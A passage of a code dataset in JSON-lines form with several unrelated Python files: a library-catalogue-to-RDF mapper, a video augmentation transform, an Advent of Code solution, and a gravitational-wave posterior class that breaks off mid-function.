{\"@id\": value}\n else:\n return {\"@id\": \"bibo:Document\"}\n\n\ndef getFormatDctMedium(record, prop):\n formatmapping = {\"Audio\": \"rdamt:1001\",\n \"Microform\": \"rdamt:1002\",\n \"Notated Music\": \"rdau:P60488\"\n }\n value = getformat(record, prop, formatmapping)\n return value if value else None\n\n\ndef getOfferedBy(record, prop):\n if record.get(prop):\n return {\n \"@type\": \"http://schema.org/Offer\",\n \"schema:offeredBy\": {\n \"@id\": \"https://data.finc.info/organisation/DE-15\",\n \"@type\": \"schema:Library\",\n \"schema:name\": \"Universitätsbibliothek Leipzig\",\n \"schema:branchCode\": \"DE-15\"\n },\n \"schema:availability\": \"http://data.ub.uni-leipzig.de/item/wachtl/DE-15:ppn:\"+record[prop]\n }\n\n\ndef getProperty(record, prop):\n ret = []\n if isinstance(prop, str):\n if prop in record:\n return record.get(prop)\n elif isinstance(prop, list):\n for elem in prop:\n if isinstance(record.get(elem), str):\n ret.append(record[elem])\n elif isinstance(record.get(elem), list):\n for elen in record[elem]:\n ret.append(elen)\n if ret:\n return ret\n else:\n return None\n\n\ndef getIsPartOf(record, prop):\n data = getProperty(record, prop)\n if isinstance(data, str):\n return {\"@id\": \"https://data.finc.info/resources/\"+data}\n elif isinstance(data, list):\n ret = []\n for elem in data:\n ret.append({\"@id\": \"https://data.finc.info/resources/\"+elem})\n return ret\n\n\ndef getIssued(record, prop):\n data = getProperty(record, prop)\n if isinstance(data, str):\n # NOTE: this relies on a \"dateTime\" entry in the context dict below;\n # if it is absent, the resulting dict key is None\n return {context.get(\"dateTime\"): data}\n elif isinstance(data, list):\n ret = []\n for elem in data:\n ret.append({\"@type\": \"xsd:gYear\",\n \"@value\": elem})\n return ret\n\n\n\"\"\"...\n \"contribution\" : [ {\n \"type\" : [ \"Contribution\" ],\n \"agent\" : {\n \"id\" : \"http://d-nb.info/gnd/1049709292\",\n \"type\" : [ \"Person\" ],\n \"dateOfBirth\" : \"1974\",\n \"gndIdentifier\" : \"1049709292\",\n \"label\" : \"Nichols, Catherine\" \n },\n \"role\" : {\n \"id\" : \"http://id.loc.gov/vocabulary/relators/edt\",\n \"label\" : \"Herausgeber/in\" \n }\n }, {\n \"type\" : [ \"Contribution\" ],\n \"agent\" : {\n \"id\" : \"http://d-nb.info/gnd/130408026\",\n \"type\" : [ \"Person\" ],\n \"dateOfBirth\" : \"1951\",\n \"gndIdentifier\" : \"130408026\",\n \"label\" : \"Blume, Eugen\" \n },\n \"role\" : {\n \"id\" : \"http://id.loc.gov/vocabulary/relators/ctb\",\n \"label\" : \"Mitwirkende\" \n }\n }\n\"\"\"\n\n\ndef get_contributon(record, prop):\n fullrecord_fixed = fixRecord(record=getProperty(record, prop), record_id=record.get(\n \"record_id\"), validation=False, replaceMethod='decimal')\n reader = pymarc.MARCReader(fullrecord_fixed.encode('utf-8'))\n data = []\n fields = [\"100\", \"110\", \"111\", \"700\", \"710\", \"711\"]\n for record in reader:\n for field in fields:\n for f in record.get_fields(field):\n contributor = {\n \"@type\": [\"bf:Contribution\"],\n \"bf:agent\": {\n \"@id\": \"http://d-nb.info/gnd/\"\n },\n \"bf:role\": {\n \"@id\": \"http://id.loc.gov/vocabulary/relators/\",\n }\n }\n if f['a']:\n contributor[\"bf:agent\"][\"rdfs:ch_label\"] = f['a']\n if f['0'] and f['0'].startswith(\"(DE-588)\"):\n contributor[\"bf:agent\"][\"@id\"] += f['0'].split(\")\")[1]\n else:\n del contributor['bf:agent']['@id']\n if f['4'] and len(f['4']) <= 4:\n if f['4'][0] == '-':\n contributor['bf:role']['@id'] += f['4'][1:]\n if rolemapping.get(f['4'][1:]):\n contributor['bf:role']['rdfs:ch_label'] = rolemapping[f['4'][1:]]\n else:\n contributor['bf:role']['@id'] += f['4']\n if 
rolemapping.get(f['4']):\n contributor['bf:role']['rdfs:ch_label'] = rolemapping[f['4']]\n else:\n del contributor['bf:role']\n if field[1:] == \"00\":\n contributor['bf:agent']['@type'] = 'bf:Person'\n elif field[1:] == \"10\":\n contributor['bf:agent']['@type'] = 'bf:Organization'\n elif field[1:] == \"11\":\n contributor['bf:agent']['@type'] = 'bf:Meeting'\n if contributor['bf:agent'].get('rdfs:ch_label'):\n data.append(contributor)\n\n return data if data else None\n\n\ndef get_rvk(record, prop):\n if prop in record:\n for rvk in record[prop]:\n if rvk == \"No subject assigned\":\n continue\n elif isinstance(rvk, str):\n return str(\"https://rvk.uni-regensburg.de/regensburger-verbundklassifikation-online#notation/{}\".format(rvk))\n\n\ndef putContext(record):\n return context\n\n# mapping={ \"target_field\":\"someString\"},\n\n# \"target_field\":{function:\"source_field\"}}\n\n\ncontext = {\n \"xsd\": \"http://www.w3.org/2001/XMLSchema#\",\n \"bf\": \"http://id.loc.gov/ontologies/bibframe/\",\n \"dct\": \"http://purl.org/dc/terms/\",\n \"dc\": \"http://purl.org/dc/terms/\",\n \"bibo\": \"http://purl.org/ontology/bibo/\",\n \"rdau\": \"http://rdaregistry.info/Elements/u/\",\n \"umbel\": \"http://umbel.org/umbel/\",\n \"isbd\": \"http://iflastandards.info/ns/isbd/elements/\",\n \"schema\": \"http://schema.org/\",\n \"rdfs\": \"https://www.w3.org/TR/rdf-schema/#\",\n \"issued\": {\n \"@id\": \"dct:issued\",\n \"@type\": \"xsd:gYear\"\n },\n \"identifier\": {\n \"@id\": \"dct:identifier\",\n \"@type\": \"xsd:string\"\n },\n \"language\": {\n \"@id\": \"http://purl.org/dc/terms/language\",\n \"@container\": \"@language\"\n },\n \"openAccessContent\": \"http://dbpedia.org/ontology/openAccessContent\",\n}\n\n\nmapping = {\n \"@context\": putContext,\n \"@id\": {getAtID: \"id\"},\n \"identifier\": {getIDs: [\"swb_id_str\", \"kxp_id_str\"]},\n \"bibo:issn\": {getProperty: \"issn\"},\n \"bibo:isbn\": {getProperty: \"isbn\"},\n \"umbel:isLike\": {getProperty: \"url\"},\n \"dct:title\": {getTitle: \"title\"},\n \"rdau:P60493\": {getTitle: [\"title_part\", \"title_sub\"]},\n \"bibo:shortTitle\": {getTitle: \"title_short\"},\n \"dct:alternative\": {getTitle: \"title_alt\"},\n \"rdau:P60327\": {getProperty: \"author\"},\n \"dc:contributor\": {getProperty: \"author2\"},\n # \"author_id\":{getGND:\"author_id\"},\n \"rdau:P60333\": {getProperty: \"imprint_str_mv\"},\n \"rdau:P60163\": {getProperty: \"publishPlace\"},\n \"dct:publisher\": {getProperty: \"publisher\"},\n \"issued\": {getIssued: \"publishDate\"},\n \"rdau:P60489\": {getProperty: \"dissertation_note\"},\n \"isbd:P1053\": {getProperty: \"physical\"},\n \"language\": {getLanguage: \"language\"},\n \"dct:isPartOf\": {getIsPartOf: \"hierarchy_top_id\"},\n \"dct:bibliographicCitation\": {getProperty: [\"container_title\", \"container_reference\"]},\n \"rdfs:ch_type\": {getFormatRdfType: \"format_finc\"},\n \"dct:medium\": {getFormatDctMedium: \"format_finc\"},\n \"openAccessContent\": {getoAC: \"facet_avail\"},\n \"schema:offers\": {getOfferedBy: \"record_id\"},\n \"bf:contribution\": {get_contributon: \"fullrecord\"},\n \"umbel:relatesToNotation\": {get_rvk: \"rvk_facet\"}\n}\n\n\ndef process_field(record, source_field):\n ret = []\n if isinstance(source_field, dict):\n for function, parameter in source_field.items():\n ret.append(function(record, parameter))\n elif isinstance(source_field, str):\n # constant string mappings are passed through verbatim\n return source_field\n elif isinstance(source_field, list):\n # lists of sub-fields are processed recursively\n for elem in source_field:\n ret.append(ArrayOrSingleValue(process_field(record, elem)))\n elif 
callable(source_field):\n return ArrayOrSingleValue(source_field(record))\n if ret:\n return ArrayOrSingleValue(ret)\n\n\ndef removeNone(obj):\n if isinstance(obj, (list, tuple, set)):\n return type(obj)(removeNone(x) for x in obj if x is not None)\n elif isinstance(obj, dict):\n return type(obj)((removeNone(k), removeNone(v))\n for k, v in obj.items() if k is not None and v is not None)\n else:\n return obj\n\n\nlock = Lock()\n\n\ndef process_line(record):\n try:\n mapline = {}\n for key, val in mapping.items():\n value = process_field(record, val)\n if value:\n mapline[key] = value\n mapline = removeNone(mapline)\n if mapline:\n with lock:\n sys.stdout.write(json.dumps(mapline, indent=None)+\"\\n\")\n sys.stdout.flush()\n except Exception as e:\n with open(\"errors.txt\", 'a') as f:\n traceback.print_exc(file=f)\n\n\ndef gen_solrdump_cmd(host):\n fl = set()\n for k, v in mapping.items():\n if not callable(v):\n for c, w in v.items():\n if isinstance(w, str):\n fl.add(w)\n elif isinstance(w, list):\n for elem in w:\n fl.add(elem)\n return \"solrdump -verbose -server {} -fl {}\".format(host, ','.join(fl))\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description='simple LOD Mapping of FINC-Records')\n parser.add_argument('-gen_cmd', action=\"store_true\",\n help='generate bash command')\n parser.add_argument(\n '-server', type=str, help=\"which server to use for harvest, only used for cmd prompt definition\")\n args = parser.parse_args()\n if args.gen_cmd:\n print(gen_solrdump_cmd(args.server))\n quit()\n p = Pool(4)\n for line in sys.stdin:\n p.apply_async(process_line, args=(json.loads(line),))\n # wait for all queued tasks before the interpreter exits; without\n # close()/join(), pending apply_async jobs can be silently dropped\n p.close()\n p.join()\n #target_record=process_line(json.loads(line))\n #if target_record:\n #print(json.dumps(target_record))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"slub/efre-lod-elasticsearch-tools","sub_path":"processing/finc2rdf.py","file_name":"finc2rdf.py","file_ext":"py","file_size_in_byte":23802,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"38"}
+{"seq_id":"69890583792","text":"# Kinetics default transform in MViT\n# from https://github.com/facebookresearch/SlowFast/\n# https://arxiv.org/pdf/2104.11227.pdf\nimport torch\nfrom torchvision import transforms\n\nfrom utils import clip_transforms\nfrom .rand_augment import rand_augment_transform\nfrom .random_erasing import RandomErasing\nfrom PIL import Image\n\n\ndef mvit_transform(args):\n auto_augment = \"rand-m7-n4-mstd0.5-inc1\"\n\n img_size_min = args.crop_size\n aa_params = {\"translate_const\": int(img_size_min * 0.45)}\n aa_params[\"interpolation\"] = Image.BICUBIC\n\n aug_transform = transforms.Compose([\n clip_transforms.ClipRandomResizedCrop(args.crop_size, scale=(0.08, 1.), ratio=(0.75, 1.3333333333333333)),\n rand_augment_transform(auto_augment, aa_params),\n clip_transforms.ClipRandomHorizontalFlip(p=0.0 if args.no_horizontal_flip else 0.5),\n clip_transforms.ToClipTensor(),\n clip_transforms.ClipNormalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n transforms.Lambda(lambda clip: torch.stack(clip, dim=0)), # T, C, H, W\n RandomErasing(0.25, mode=\"pixel\", max_count=1, num_splits=False, device=\"cpu\"),\n transforms.Lambda(lambda clip: torch.transpose(clip, 0, 1)) # C, T, H, W\n ])\n\n return aug_transform
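# Usage sketch (hypothetical, not part of the original file): args can be any
# object exposing crop_size and no_horizontal_flip, and the clip_transforms
# used above are assumed to operate on a list of PIL frames, as their names
# suggest.
#
#   from argparse import Namespace
#   args = Namespace(crop_size=224, no_horizontal_flip=False)
#   transform = mvit_transform(args)
#   clip = [Image.new(\"RGB\", (320, 240)) for _ in range(16)]  # 16 frames
#   out = transform(clip)  # tensor of shape [C, T, H, W]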
","repo_name":"ZhaofanQiu/Optimization-Planning-for-3D-ConvNets","sub_path":"utils/mvit_transform/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"}
+{"seq_id":"72384438829","text":"with open('data/my_input/15.in') as f:\n lines = [ line.strip() for line in f]\n\nwith open('data/test/15.test') as f2:\n tests = [ test.strip() for test in f2]\n\ndef part1(vlines,num):\n d=dict()\n li= ''.join(vlines).split(\",\")\n r=1\n \n lastindex=dict()\n for i,j in enumerate(li):\n lastindex[int(j)]=i+1\n prev=int(j)\n r=i+1\n\n new=True\n while r!=num:\n r+=1\n if new :\n \n #speak\n prev=0\n \n #precalculate\n if prev in lastindex:\n d[prev]=r-lastindex[prev]\n new=False\n else:\n new=True\n \n \n #record\n lastindex[prev]=r\n\n else:\n #speak\n prev=d[prev]\n\n #precalculate\n if prev in lastindex:\n new=False\n d[prev]=r-lastindex[prev]\n else:\n new=True\n\n #record\n lastindex[prev]=r\n \n return prev\n\n\nprint(\"test part1\",part1(tests,2020))\nprint(\"output part1\",part1(lines,2020))\nprint(\"test part2\",part1(tests,30000000))\nprint(\"output part2\",part1(lines,30000000))","repo_name":"cthiounn/adventofcode-2020-python","sub_path":"day15.py","file_name":"day15.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"24827630366","text":"import numpy as np\nimport fftw3\nimport lal\nimport lalsimulation as ls\nfrom posterior_utils import *\nfrom pylal import SimInspiralUtils\nimport scipy.interpolate as si\nimport scipy.stats as st\nimport utils as u\n\nclass Posterior(object):\n \"\"\"Callable object representing the posterior.\"\"\"\n\n def __init__(self, time_data=None, freq_data=None,\n inj_params=None, inj_xml=None, event=0, srate=16384,\n T=None, time_offset=lal.LIGOTimeGPS(0),\n approx=ls.TaylorF2, amp_order=-1, phase_order=-1,\n fmin=20.0, fref=100.0, malmquist_snr=None, mmin=1.0,\n mmax=35.0, dmax=1000.0, dataseed=None,\n data_psdparams=None, detectors=['H1', 'L1', 'V1'],\n psd=None, npsdfit=4):\n r\"\"\"Set up the posterior. By default, analytic Advanced LIGO and\n Advanced Virgo noise spectra are used for the chosen detectors.\n\n :param time_data: A list of float arrays giving the\n time-domain data in each detector on which the analysis is\n to operate. If ``None``, then data are generated from\n Gaussian noise. The time-domain data will be windowed with\n the default Tukey window from :func:`u.tukey_window` before\n being Fourier-transformed.\n\n :param freq_data: A list of complex arrays giving the\n frequency-domain data in each detector on which the analysis\n is to operate. If both ``time_data`` and ``freq_data`` are\n ``None`` then data are generated from Gaussian noise.\n\n :param inj_params: Parameters for a waveform to be injected.\n\n :param inj_xml: XML filename describing a waveform to be\n injected.\n\n :param event: The event number (starting with zero) of the\n injection from the XML.\n\n :param srate: The sample rate, in Hz.\n\n :param T: The total length of the data segment (in seconds).\n If ``None``, extracted from ``time_data``.\n\n :param time_offset: The GPS start time of the segment being\n analyzed.\n\n :param approx: The waveform approximant to use (frequency-domain\n approximants are used directly; time-domain approximants are\n Fourier-transformed internally).\n\n :param amp_order: The amplitude order parameter for the\n waveform. 
Use ``-1`` for maximum order.\n\n :param phase_order: The phase order for the waveform. Use\n ``-1`` for maximum order.\n\n :param fmin: The minimum frequency for the analysis.\n\n :param fref: The reference frequency where freq-dependent\n waveform quantities are computed.\n\n :param malmquist_snr: If not ``None``, gives the SNR threshold\n in the second-loudest detector (or only detector) below\n which the prior probability is zero.\n\n :param mmin: Minimum component mass threshold.\n\n :param mmax: Maximum component mass threshold.\n \n :param dmax: Maximum distance.\n\n :param dataseed: If not ``None``, will be used as a RNG seed\n for generating any synthetic data.\n\n :param data_psdparams: If not ``None``, the PSD fitting\n parameters to be used to modify the PSD when producing\n synthetic data. This argument only makes sense when both\n ``time_data`` and ``freq_data`` are ``None``.\n\n :param detectors: The detectors on which the analysis runs.\n\n :param psd: A list of PSDs to use instead of the synthetic\n AdLIGO PSD from LALSimultion. There should be one PSD per\n detector.\n\n :param npsdfit: The number of PSD fitting parameters to use.\n\n \"\"\"\n\n self._srate = srate\n self._time_offset = u.GPSTime(time_offset.gpsSeconds, time_offset.gpsNanoSeconds)\n self._approx = approx\n self._amp_order = amp_order\n self._phase_order = phase_order\n self._fmin = fmin\n self._fref = fref\n self._msnr = malmquist_snr\n self._mmin = mmin\n self._mmax = mmax\n self._dmax = dmax\n self._detectors = detectors\n\n if T is None:\n self._T = time_data[0].shape[0]/srate\n else:\n self._T = T\n\n data_length = int(round(self.T*self.srate/2+1))\n\n self._fs = np.linspace(0, srate/2.0, self.T*self.srate/2+1)\n\n self._npsdfit = npsdfit\n self._psdfitfs = np.exp(np.linspace(np.log(self.fmin), np.log(self.fs[-1]), self.npsdfit))\n\n if psd is not None:\n # Cut the PSD down to length if it's too long\n self._psd = [p[:self.fs.shape[0]] for p in psd]\n else:\n self._psd = [np.zeros(self.fs.shape[0]) for d in detectors]\n for d, psd in zip(detectors, self.psd):\n if d[0] == 'H' or d[0] == 'L':\n for i in range(self.fs.shape[0]):\n psd[i] = ls.SimNoisePSDaLIGOZeroDetHighPower(self.fs[i])\n elif d[0] == 'V':\n for i in range(self.fs.shape[0]):\n psd[i] = ls.SimNoisePSDAdvVirgo(self.fs[i])\n\n # Zero out PSD below fmin\n for p in self.psd:\n p[self.fs < fmin] = float('inf')\n\n if time_data is None and freq_data is None:\n self._data = [np.zeros(data_length, dtype=np.complex) for d in detectors]\n\n # Maybe set seed?\n if dataseed is not None:\n old_state = np.random.get_state()\n np.random.seed(dataseed)\n \n if data_psdparams is not None:\n params = np.zeros(1, dtype=self.dtype)\n params['psdfit'] = data_psdparams\n psd = self.adjusted_psd(params)\n else:\n psd = self.psd\n\n for j in range(len(detectors)):\n # 0.5 = 2 * 1/sqrt(2). 
One sqrt(2) from\n # one-sided-->two-sided, and the other from <|z|> =\n # sqrt(2) if x,y ~ N(0,1).\n self.data[j] = 0.5*np.sqrt(psd[j]/(self.fs[1]-self.fs[0]))*(np.random.normal(size=data_length) +\n np.random.normal(size=data_length)*1j)\n self.data[j][psd[j]==float('inf')] = 0.0\n\n # Reset random state\n if dataseed is not None:\n np.random.set_state(old_state)\n elif time_data is None:\n self._data = freq_data\n else:\n self._data = []\n for i in range(len(detectors)):\n N = time_data[i].shape[0]\n\n this_srate = float(N)/self.T\n dt = 1.0/this_srate\n\n window = u.tukey_window(N)\n\n fdata = np.fft.rfft(time_data[i]*window)*dt\n\n # Now cut down to the actual sample rate\n self._data.append(fdata[:data_length])\n\n self._c2r_input_fft_array = np.zeros(self.data[0].shape[0], dtype=np.complex128)\n self._c2r_output_fft_array = np.zeros((self.data[0].shape[0]-1)*2, dtype=np.float64)\n self._c2r_fft_plan = fftw3.Plan(inarray=self.c2r_input_fft_array, outarray=self.c2r_output_fft_array, \n direction='forward', flags=['measure']) \n\n self._r2c_input_fft_array = np.zeros((self.data[0].shape[0]-1)*2, dtype=np.float64)\n self._r2c_output_fft_array = np.zeros(self.data[0].shape[0], dtype=np.complex128)\n self._r2c_fft_plan = fftw3.Plan(inarray=self.r2c_input_fft_array, outarray=self.r2c_output_fft_array, direction='forward', flags=['measure'])\n\n if inj_xml is not None:\n params = self.inj_xml_to_params(inj_xml)\n hs = self.generate_waveform(params)\n for i, h in enumerate(hs):\n self.data[i] += h\n elif inj_params is not None:\n hs = self.generate_waveform(inj_params)\n for i,h in enumerate(hs):\n self.data[i] += h\n \n # Handle unpickling the internal state\n def __setstate__(self, state):\n for k,v in state.items():\n self.__dict__[k] = v\n\n # Just the FFTW3 Plans are screwed up:\n self._r2c_fft_plan = fftw3.Plan(inarray=self.r2c_input_fft_array, outarray=self.r2c_output_fft_array, direction='forward', flags=['measure'])\n self._c2r_fft_plan = fftw3.Plan(inarray=self.c2r_input_fft_array, outarray=self.c2r_output_fft_array, direction='forward', flags=['measure']) \n\n @property\n def data(self):\n \"\"\"The frequency-domain data on which the analysis will be conducted.\"\"\"\n return self._data\n\n @property\n def T(self):\n \"\"\"The length (in seconds) of the input data segment.\"\"\"\n return self._T\n\n @property\n def fs(self):\n \"\"\"The frequencies (in Hz) that correspond to the frequency domain data.\"\"\"\n return self._fs\n\n @property\n def df(self):\n \"\"\"The spacing in frequency space.\n\n \"\"\"\n return self.fs[1]-self.fs[0]\n\n @property\n def srate(self):\n \"\"\"The sample rate of the time-domain data.\"\"\"\n return self._srate\n \n @property\n def time_offset(self):\n \"\"\"The GPS time of the start of the data segment.\"\"\"\n return self._time_offset\n\n @property \n def approx(self):\n \"\"\"The waveform approximant.\"\"\"\n return self._approx\n\n @property\n def amp_order(self):\n \"\"\"Amplitude order (``-1`` for max order).\"\"\"\n return self._amp_order\n\n @property\n def phase_order(self):\n \"\"\"The phase order (``-1`` for max order).\"\"\"\n return self._phase_order\n\n @property\n def fmin(self):\n \"\"\"The minimum frequency of the analysis.\"\"\"\n return self._fmin\n\n @property\n def fref(self):\n \"\"\"The reference frequency at which freq-dependent waveform quantities\n are defined.\"\"\"\n\n return self._fref\n\n @property\n def psd(self):\n \"\"\"The array of (one-sided) noise PSDs used in the analysis (one per\n detector).\"\"\"\n return 
self._psd\n\n @property\n def npsdfit(self):\n \"\"\"The number of PSD fitting parameters to use.\n\n \"\"\"\n\n return self._npsdfit\n\n @property\n def psdfitfs(self):\n \"\"\"The frequencies at which the PSD fit spline knots live.\n\n \"\"\"\n\n return self._psdfitfs\n\n @property\n def msnr(self):\n \"\"\"The SNR below which the prior goes to zero (or ``None`` for no threshold).\"\"\"\n return self._msnr\n\n @property\n def mmin(self):\n \"\"\"The minimum component mass.\"\"\"\n return self._mmin\n\n @property\n def mmax(self):\n \"\"\"The maximum component mass.\"\"\"\n return self._mmax\n\n @property\n def dmax(self):\n \"\"\"The maximum distance.\"\"\"\n return self._dmax\n\n @property\n def detectors(self):\n return self._detectors\n\n @property\n def ndetectors(self):\n return len(self.detectors)\n\n @property \n def c2r_input_fft_array(self):\n return self._c2r_input_fft_array\n\n @property\n def c2r_output_fft_array(self):\n return self._c2r_output_fft_array\n\n @property\n def c2r_fft_plan(self):\n return self._c2r_fft_plan\n\n @property\n def r2c_input_fft_array(self):\n return self._r2c_input_fft_array\n\n @property\n def r2c_output_fft_array(self):\n return self._r2c_output_fft_array\n\n @property\n def r2c_fft_plan(self):\n return self._r2c_fft_plan\n\n @property\n def nparams(self):\n \"\"\"The dimensionality of the parameter space.\"\"\"\n return 15 + self.ndetectors*self.npsdfit\n\n @property\n def header(self):\n \"\"\"A useful header describing the parameters for this posterior in text files.\n\n \"\"\"\n\n header = ['log_mc', 'eta', 'cos_iota', 'phi', 'psi', 'time', 'ra',\n 'sin_dec', 'log_dist', 'a1', 'cos_tilt1', 'phi1', 'a2', 'cos_tilt2', \n 'phi2']\n\n for d in self.detectors:\n for i in range(self.npsdfit):\n header.append('{0:s}PSD{1:02d}'.format(d,i))\n\n return ' '.join(header)\n\n def to_params(self, p):\n return p.view([('log_mc', np.float),\n ('eta', np.float),\n ('cos_iota', np.float),\n ('phi', np.float),\n ('psi', np.float),\n ('time', np.float),\n ('ra', np.float),\n ('sin_dec', np.float),\n ('log_dist', np.float), \n ('a1', np.float),\n ('cos_tilt1', np.float),\n ('phi1', np.float),\n ('a2', np.float),\n ('cos_tilt2', np.float),\n ('phi2', np.float)] + [('psdfit', np.float, (self.ndetectors, self.npsdfit))])\n\n def adjusted_psd(self, params):\n \"\"\"Returns a PSD for each detector, adjusted by the PSD parameters for\n that detector.\n\n \"\"\"\n\n if self.npsdfit == 0:\n return self.psd\n\n params = self.to_params(params)\n sel = self.fs >= self.fmin\n\n fs = self.fs[sel]\n\n psds = []\n\n for raw_psd, psdp in zip(self.psd, params['psdfit'].squeeze()):\n log_factors = si.InterpolatedUnivariateSpline(np.log(self.psdfitfs), psdp)(np.log(fs))\n\n psd = raw_psd.copy()\n psd[sel] *= np.exp(log_factors)\n\n psds.append(psd)\n\n return psds\n\n def inj_xml_to_params(self, inj_xml, event=0, psdfit=None):\n \"\"\"Returns the parameters that correspond to the given XML file,\n optionally with the given PSD fitting parameters.\n\n :param inj_xml: Filename of the injection XML.\n\n :param event: The event number to use from the XML.\n\n :param psdfit: The PSD fitting parameters to add to the\n returned parameters.\n\n \"\"\"\n\n p = self.to_params(np.zeros(self.nparams))\n\n table = SimInspiralUtils.ReadSimInspiralFromFiles([inj_xml])[event]\n\n p['log_mc'] = np.log(table.mchirp)\n p['eta'] = table.eta\n p['log_dist'] = np.log(table.distance)\n p['ra'] = table.longitude\n p['sin_dec'] = np.sin(table.latitude)\n p['cos_iota'] = np.cos(table.inclination)\n 
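        # note the sampled coordinates: masses enter as (log_mc, eta), the sky
        # position as (ra, sin_dec) and the orientation as cos_iota, matching
        # the field layout declared in to_params above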
p['phi'] = table.coa_phase\n p['psi'] = table.polarization\n \n time_offset = self.time_offset.LIGOTimeGPS\n p['time'] = table.geocent_end_time - time_offset.gpsSeconds + 1e-9*(table.geocent_end_time_ns - time_offset.gpsNanoSeconds)\n\n s1 = np.array([table.spin1x, table.spin1y, table.spin1z])\n s2 = np.array([table.spin2x, table.spin2y, table.spin2z])\n\n Lhat = np.array([np.sin(table.inclination), 0.0, np.cos(table.inclination)])\n xhat = np.array([np.cos(table.inclination), 0.0, -np.sin(table.inclination)])\n yhat = np.array([0.0,1.0,0.0])\n\n if np.linalg.norm(s1) == 0.0:\n p['a1'] = 0.0\n p['cos_tilt1'] = 1.0\n p['phi1'] = 0.0\n else:\n a1 = np.linalg.norm(s1)\n p['a1'] = a1\n p['cos_tilt1'] = np.dot(s1, Lhat)/a1\n p['phi1'] = np.arctan2(np.dot(s1, yhat), np.dot(s1, xhat))\n if p['phi1'] < 0.0:\n p['phi1'] += 2.0*np.pi\n\n if np.linalg.norm(s2) == 0.0:\n p['a2'] = 0.0\n p['cos_tilt2'] = 1.0\n p['phi2'] = 0.0\n else:\n a2 = np.linalg.norm(s2)\n p['a2'] = a2\n p['cos_tilt2'] = np.dot(s2, Lhat)/a2\n p['phi2'] = np.arctan2(np.dot(s2, yhat), np.dot(s2, xhat))\n if p['phi2'] < 0.0:\n p['phi2'] += 2.0*np.pi\n\n if psdfit is not None:\n p['psdfit'] = psdfit\n\n return p\n\n\n def generate_waveform(self, params):\n \"\"\"Returns a frequency-domain strain suitable to subtract from the\n frequency-domain data (i.e. the samples line up in frequency\n space).\n \"\"\"\n\n params = self.to_params(params).squeeze()\n\n # Can only handle one parameter set at a time, so extract\n # first from array if more than one.\n if isinstance(params, np.ndarray) and params.ndim > 0:\n params = params[0]\n elif isinstance(params, np.ndarray):\n params = params[()]\n \n m1,m2 = u.mc_eta_to_masses(np.exp(params['log_mc']), params['eta'])\n d = 1e6*lal.PC_SI*np.exp(params['log_dist'])\n i = np.arccos(params['cos_iota'])\n\n dec = np.arcsin(params['sin_dec'])\n\n inc = np.arccos(params['cos_iota'])\n\n a1 = params['a1']\n tilt1 = np.arccos(params['cos_tilt1'])\n phi1 = params['phi1']\n a2 = params['a2']\n tilt2 = np.arccos(params['cos_tilt2'])\n phi2 = params['phi2']\n\n zhat = np.array([np.sin(inc), 0.0, np.cos(inc)])\n xhat = np.array([np.cos(inc), 0.0, -np.sin(inc)])\n yhat = np.array([0.0, 1.0, 0.0])\n\n s1 = a1 * (np.cos(phi1)*np.sin(tilt1)*xhat +\\\n np.sin(phi1)*np.sin(tilt1)*yhat +\\\n np.cos(tilt1)*zhat)\n s2 = a2 * (np.cos(phi2)*np.sin(tilt2)*xhat +\\\n np.sin(phi2)*np.sin(tilt2)*yhat +\\\n np.cos(tilt2)*zhat)\n\n if ls.SimInspiralImplementedFDApproximants(self.approx) == 1:\n hplus,hcross = ls.SimInspiralChooseFDWaveform(params['phi'], \n self.fs[1]-self.fs[0],\n m1*lal.MSUN_SI, m2*lal.MSUN_SI, \n s1[0], s1[1], s1[2],\n s2[0], s2[1], s2[2],\n self.fmin, self.fs[-1], 100.0,\n d, i, \n 0.0, 0.0,\n None, None, \n self.amp_order, self.phase_order, \n self.approx)\n\n hpdata = hplus.data.data\n hcdata = hcross.data.data\n\n # If necessary, cut down to size\n if hpdata.shape[0] > self.fs.shape[0]:\n hpdata = hpdata[:self.fs.shape[0]]\n hcdata = hcdata[:self.fs.shape[0]]\n else:\n hplus,hcross = ls.SimInspiralChooseTDWaveform(params['phi'],\n 1.0/self.srate,\n m1*lal.MSUN_SI, m2*lal.MSUN_SI, \n s1[0], s1[1], s1[2],\n s2[0], s2[1], s2[2],\n self.fmin, self.fref,\n d, i, \n 0.0, 0.0,\n None, None, \n self.amp_order, self.phase_order, \n self.approx)\n \n Ntime = (self.data[0].shape[0]-1)*2\n \n # Cut down to length if necessary\n hpdata = hplus.data.data\n hcdata = hcross.data.data\n tC_index = int(round(-(hplus.epoch.gpsSeconds + 1e-9*hplus.epoch.gpsNanoSeconds)*self.srate))\n if hpdata.shape[0] > Ntime:\n 
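                # the TD waveform is longer than the analysis segment, so only
                # the last Ntime samples are kept; shift the coalescence sample
                # index tC_index by the number of samples dropped from the front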
tC_index -= hpdata.shape[0] - Ntime\n hpdata = hpdata[-Ntime:]\n hcdata = hcdata[-Ntime:]\n\n # Now Fourier transiform; place the waveform's tC index\n # into the zero index of the FT array\n Nbegin = hpdata.shape[0] - tC_index\n\n self.r2c_input_fft_array[:] = 0.0\n self.r2c_input_fft_array[:Nbegin] = hpdata[tC_index:]\n self.r2c_input_fft_array[-tC_index:] = hpdata[:tC_index]\n self.r2c_fft_plan()\n hpdata = self.r2c_output_fft_array / self.srate # multiply by dt\n \n self.r2c_input_fft_array[:] = 0.0\n self.r2c_input_fft_array[:Nbegin] = hcdata[tC_index:]\n self.r2c_input_fft_array[-tC_index:] = hcdata[:tC_index]\n self.r2c_fft_plan()\n hcdata = self.r2c_output_fft_array / self.srate # multiply by dt\n\n hout=[]\n for d in self.detectors:\n sec = self.time_offset.sec + int(params['time'])\n ns = self.time_offset.ns + int(round(1e9*(params['time']-int(params['time']))))\n\n while ns > 1e9:\n sec += 1\n ns -= 1e9\n \n tgps = lal.LIGOTimeGPS(sec, nanoseconds=ns)\n\n gmst = lal.GreenwichMeanSiderealTime(tgps)\n\n if d == 'H1':\n diff = lal.LALDetectorIndexLHODIFF\n elif d == 'L1':\n diff = lal.LALDetectorIndexLLODIFF\n elif d == 'V1':\n diff = lal.LALDetectorIndexVIRGODIFF\n else:\n raise ValueError('detector 